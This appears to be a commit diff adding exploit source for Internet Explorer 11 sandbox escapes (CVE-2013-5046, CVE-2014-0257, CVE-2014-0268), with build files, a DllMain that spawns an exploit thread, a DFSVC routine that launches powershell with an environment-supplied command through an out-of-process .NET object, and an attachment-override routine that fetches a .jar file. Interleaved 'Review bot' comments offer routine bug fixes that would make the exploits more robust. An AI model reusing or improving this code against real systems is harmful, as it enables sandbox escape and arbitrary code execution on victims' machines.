<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2013-5046.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
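Review bot: The `HANDLE` returned by `CreateThread` in the `DLL_PROCESS_ATTACH` case is dropped, so the thread object is leaked for the lifetime of the host process and a failed `CreateThread` goes unnoticed while `DllMain` still returns `TRUE`. Capture and close it: `HANDLE h = CreateThread(nullptr, 0, ExploitThread, hModule, 0, nullptr); if (h) CloseHandle(h);` — closing the handle does not stop the thread. A thread created inside `DllMain` does not begin running until `DllMain` returns and the loader lock is released, which is acceptable here since `ExploitThread` (defined in the sibling .cpp) does its own `CoInitialize` and finishes with `FreeLibraryAndExitThread`; a one-line comment saying so would spare the next reader the loader-lock worry.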
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,12 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
||||
#include "interfaces.h"
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
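--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
@@ -0,0 +1,201 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+#define MAX_ENV 32767
+
+#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent")
+
+const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}";
+
+long GetSafeArrayLen(LPSAFEARRAY psa)
+{
+long ubound = 0;
+
+SafeArrayGetUBound(psa, 1, &ubound);
+
+return ubound + 1;
+}
+
+mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount)
+{
+LPSAFEARRAY methods = type->GetMethods_2();
+mscorlib::_MethodInfoPtr ret;
+LONG methodCount = GetSafeArrayLen(methods);
+
+for (long i = 0; i < methodCount; ++i)
+{
+IUnknown* v = nullptr;
+
+if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v)))
+{
+mscorlib::_MethodInfoPtr method = v;
+
+bstr_t name = method->Getname();
+LPSAFEARRAY params = method->GetParameters();
+long paramCount = GetSafeArrayLen(params);
+
+if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount)
+{
+ret = method;
+break;
+}
+}
+}
+
+SafeArrayDestroy(methods);
+
+return ret;
+}
+
+template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args)
+{
+variant_t obj;
+T retObj;
+
+SAFEARRAY * psa;
+SAFEARRAYBOUND rgsabound[1];
+
+rgsabound[0].lLbound = 0;
+rgsabound[0].cElements = (ULONG)args.size();
+psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound);
+
+for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies)
+{
+SafeArrayPutElement(psa, &indicies, &args[indicies]);
+}
+
+variant_t ret = method->Invoke_3(obj, psa);
+
+if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH))
+{
+retObj = ret.punkVal;
+}
+
+SafeArrayDestroy(psa);
+
+return retObj;
+}
+
+bstr_t GetEnv(LPWSTR env)
+{
+WCHAR buf[MAX_ENV];
+
+GetEnvironmentVariable(env, buf, MAX_ENV);
+
+return buf;
+}
+
+void DoDfsvcExploit()
+{
+CLSID clsid;
+
+CLSIDFromString(CLSID_DFSVC, &clsid);
+
+DebugPrintf("Starting DFSVC Exploit\n");
+
+mscorlib::_ObjectPtr obj;
+
+HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+
+if (FAILED(hr))
+{
+WCHAR cmdline[] = L"dfsvc.exe";
+
+STARTUPINFO startInfo = { 0 };
+PROCESS_INFORMATION procInfo = { 0 };
+
+// Start dfsvc (because we can due to the ElevationPolicy)
+if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
+nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
+{
+CloseHandle(procInfo.hProcess);
+CloseHandle(procInfo.hThread);
+
+// Just sleep to ensure it comes up
+Sleep(4000);
+hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+}
+else
+{
+DebugPrintf("Couldn't create service %d\n", GetLastError());
+}
+}
+
+if (SUCCEEDED(hr))
+{
+try
+{
+mscorlib::_TypePtr type = obj->GetType();
+
+// Get type of Type (note defaults to RuntimeType then TypeInfo)
+type = type->GetType()->BaseType->BaseType;
+
+DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
+
+mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
+
+DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
+
+std::vector<variant_t> getTypeArgs;
+
+getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
+
+// Get process type
+type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
+
+if (type)
+{
+mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
+
+if (startMethod)
+{
+std::vector<variant_t> startArgs;
+
+startArgs.push_back(L"powershell");
+startArgs.push_back(GetEnv(L"PSHCMD"));
+
+ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
+}
+else
+{
+DebugPrintf("Couldn't find Start method");
+}
+}
+else
+{
+DebugPrintf("Couldn't find Process Type");
+}
+}
+catch (_com_error e)
+{
+DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
+}
+}
+else
+{
+DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
+}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+CoInitialize(nullptr);
+DoDfsvcExploit();
+CoUninitialize();
+
+FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}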
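Review bot: `GetEnv` never checks the return value of `GetEnvironmentVariable`, so when `PSHCMD` (or `windir`) is unset the 64 KB stack buffer is returned uninitialised, and for `PSHCMD` that garbage becomes the argument string passed with `L"powershell"` to the `Process.Start` overload invoked through the out-of-process dfsvc object. Zero-initialise the buffer and fail closed: `WCHAR buf[MAX_ENV] = { 0 };` and `if (GetEnvironmentVariable(env, buf, MAX_ENV) == 0) return bstr_t(L"");`, with the `startMethod` branch then skipping the launch when `PSHCMD` comes back empty rather than starting a bare powershell. `GetStaticMethod` also never `Release()`s the reference that `SafeArrayGetElement` adds to each `IUnknown* v` and never `SafeArrayDestroy`s the `params` array it gets from `GetParameters()`; harmless for a one-shot escape, but worth a `// leaks are tolerated: process exits after the escape` comment so nobody copies the pattern. The message `"Couldn't create service"` is misleading since dfsvc.exe is launched here as an ordinary process via `CreateProcess`, not as a service.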
182
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj
vendored
Executable file
|
@ -0,0 +1,182 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2014-0257.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
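Review bot: The `HANDLE` returned by `CreateThread` in the `DLL_PROCESS_ATTACH` case is discarded, leaking the thread object for the life of the host process and silently ignoring a failed `CreateThread` while `DllMain` still reports `TRUE`. Capture and close it: `HANDLE h = CreateThread(nullptr, 0, ExploitThread, hModule, 0, nullptr); if (h) CloseHandle(h);` — the thread keeps running after its handle is closed. This file is byte-identical to the CVE-2013-5046 `dllmain.cpp` added in the same commit, so whichever fix lands should be applied to both.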
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,11 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
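--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
@@ -0,0 +1,81 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+#include <Exdisp.h>
+
+_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2));
+
+void DoSetAttachmentUserOverride()
+{
+IShdocvwBroker* shdocvw = nullptr;
+
+try
+{
+HRESULT ret;
+shdocvw = CreateSHDocVw();
+
+CLSID clsid;
+
+CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid);
+
+IWebBrowser2Ptr browser;
+
+ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser));
+if (FAILED(ret))
+{
+DebugPrintf("CoCreateInstance: %08X", ret);
+throw new _com_error(ret);
+}
+
+DebugPrintf("browser: %p", browser);
+
+unsigned char buf[1] = { 0 };
+
+ret = shdocvw->SetAttachmentUserOverride(L"jarfile");
+if (FAILED(ret))
+{
+DebugPrintf("Failed to set attachement user override\n");
+throw new _com_error(ret);
+}
+
+bstr_t nav = L"http://www.dummy.local/testapp.jar";
+
+DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr));
+}
+catch (_com_error e)
+{
+DebugPrintf("Error during processing: %ls\n", e.ErrorMessage());
+}
+
+if (shdocvw)
+{
+shdocvw->Release();
+shdocvw = nullptr;
+}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+CoInitialize(nullptr);
+DoSetAttachmentUserOverride();
+CoUninitialize();
+
+FreeLibraryAndExitThread((HMODULE)hModule, 0);
+
+return 0;
+}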
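Review bot: The two `throw new _com_error(ret)` statements in DoSetAttachmentUserOverride throw a `_com_error*`, but the handler is `catch (_com_error e)`, so neither throw is ever caught: the exception leaves the function, the `shdocvw->Release()` cleanup after the try block is skipped, and since ExploitThread has no handler the process is torn down instead of logging the error. The same function also dereferences `shdocvw` without a check, although CreateSHDocVw in this commit's Utils.cpp returns nullptr when the broker cannot be created. I would change both throws to `throw _com_error(ret);`, the handler to `catch (const _com_error& e)`, and add `if (!shdocvw) throw _com_error(E_POINTER);` directly after the CreateSHDocVw call; the unused `buf` local can go. Note too that the navigation target `http://www.dummy.local/testapp.jar` is hard-coded and nothing in this hunk shows how the module substitutes its own server, so that is presumably patched into the built binary — worth confirming and documenting in a comment on that line.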
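--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
@@ -0,0 +1,183 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
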